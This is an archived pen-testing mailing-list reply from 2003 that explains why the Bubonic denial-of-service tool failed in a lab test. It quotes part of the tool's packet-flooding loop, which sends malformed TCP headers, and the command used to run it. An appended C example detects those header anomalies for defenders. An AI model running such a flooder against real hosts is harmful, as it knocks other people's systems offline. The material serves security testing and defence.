RE: Bubonic DoS tool

From: Yonatan Bokovza (Yonatanat_private)
Date: Tue Mar 11 2003 - 02:09:40 PST

    > -----Original Message-----
    > From: Indian Tiger [mailto:indiantigerat_private]
    > Sent: Thursday, February 06, 2003 18:43
    > To: pen-testat_private
    > Cc: silat_private
    > Subject: Bubonic DoS tool
    > 
    > 
    > Hi All,
    > 
    > I was testing the "Bubonic.c lame DoS against Windows 2000 machines and
    > certain versions of Linux" in a test scenario over Linux 8.0. I have compiled
    > its source code and am running its binary as follows:
    > # ./bubonic 10.3.10.22 10.3.8.70 100 1000
    > On executing the above command, there was no observable immediate effect,
    > but the Hub was showing the collisions (which were the Red Steady). Ethereal
    > shows the packets routed to destination.
    > But after executing the command the destination machine must be
    > blocked/freeze, but it's not happening.
    
    The code is very easy to understand. The "interesting" part is
    in flooder(), my comments inline:
    
    void flooder(void)
    {
    ...
        packet.ip.ip_p              = IPPROTO_TCP;
        packet.ip.ip_tos            = rand();
    ...
        packet.tcp.th_flags         = random();
        packet.tcp.th_win           = 65535;
        packet.tcp.th_seq           = random();
        packet.tcp.th_ack           = 0;
        packet.tcp.th_off           = 0; 
        packet.tcp.th_urp           = random();
        packet.tcp.th_dport         = random();
    ...
        cksum.pseudo.ptcl           = IPPROTO_TCP;
        cksum.pseudo.tcpl           = random();
    ...
        for(i=0;;++i) {
    ...
           if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
        }
    }
    
    To sum up and simplify, this sends TCP packets with a bad header.
    As a result, my unpatched win2k's CPU graph stays over 90%
    in the kernel, causing Albinoni to sound bad.
    
    Best Regards, 
    
    Yonatan Bokovza
    IT Security Consultant
    Xpert Systems
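
Added example, not part of the original message or of bubonic.c: a defender-side sanity check for the header fields the excerpt above zeroes or randomizes (th_off, th_flags, th_urp, and a checksum built from a random tcpl). The function name, anomaly bits, flag heuristics and the sample packet are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Anomaly bits (names are this example's own, not from bubonic.c). */
enum { A_NOT_TCP4 = 1, A_BAD_OFFSET = 2, A_BAD_FLAGS = 4, A_STRAY_URP = 8, A_BAD_CKSUM = 16 };

/* Constructed sample: well-formed SYN, 192.0.2.1:1234 -> 192.0.2.2:80. */
static const uint8_t SAMPLE_SYN[40] = {
    0x45,0x00,0x00,0x28, 0x00,0x01,0x00,0x00, 0x40,0x06,0xf6,0xcb,
    0xc0,0x00,0x02,0x01, 0xc0,0x00,0x02,0x02,
    0x04,0xd2,0x00,0x50, 0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00,
    0x50,0x02,0xff,0xff, 0x26,0xbc,0x00,0x00 };

/* One's-complement sum of big-endian 16-bit words (RFC 1071). */
static uint32_t sum16(const uint8_t *p, size_t n, uint32_t acc) {
    for (; n > 1; p += 2, n -= 2) acc += ((uint32_t)p[0] << 8) | p[1];
    if (n) acc += (uint32_t)p[0] << 8;
    return acc;
}

/* Inspect a raw IPv4 packet; return a bitmask of TCP header anomalies. */
unsigned tcp_anomalies(const uint8_t *pkt, size_t len) {
    if (len < 40 || (pkt[0] >> 4) != 4 || pkt[9] != 6) return A_NOT_TCP4;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4, tot = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || tot > len || tot < ihl + 20) return A_NOT_TCP4;
    const uint8_t *tcp = pkt + ihl;
    size_t tcplen = tot - ihl, off = (size_t)(tcp[12] >> 4) * 4;
    uint8_t fl = tcp[13];
    unsigned r = 0;
    if (off < 20 || off > tcplen) r |= A_BAD_OFFSET;       /* th_off = 0 lands here */
    if (!(fl & 0x3f) || (fl & 0x03) == 0x03 || (fl & 0x06) == 0x06)
        r |= A_BAD_FLAGS;               /* heuristic: null, SYN+FIN, SYN+RST */
    if ((tcp[18] | tcp[19]) && !(fl & 0x20)) r |= A_STRAY_URP; /* th_urp, no URG */
    /* Checksum over pseudo-header (addresses, protocol, TCP length) + segment. */
    uint32_t acc = sum16(tcp, tcplen, sum16(pkt + 12, 8, 0) + 6 + (uint32_t)tcplen);
    while (acc >> 16) acc = (acc & 0xffff) + (acc >> 16);
    if (acc != 0xffff) r |= A_BAD_CKSUM;
    return r;
}

int main(void) {
    uint8_t bad[40];
    memcpy(bad, SAMPLE_SYN, sizeof bad);
    bad[32] = 0x00; bad[33] = 0x03; bad[38] = 0x12;  /* th_off=0, SYN+FIN, th_urp set */
    printf("good=%u bad=%u\n", tcp_anomalies(SAMPLE_SYN, 40), tcp_anomalies(bad, 40));
    return 0;
}
```

A nonzero urgent pointer without URG is legal on the wire, so A_STRAY_URP is a suspicion signal rather than a protocol violation; a data offset below 5 words is never valid.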
    



    This archive was generated by hypermail 2b30 : Tue Mar 11 2003 - 09:12:33 PST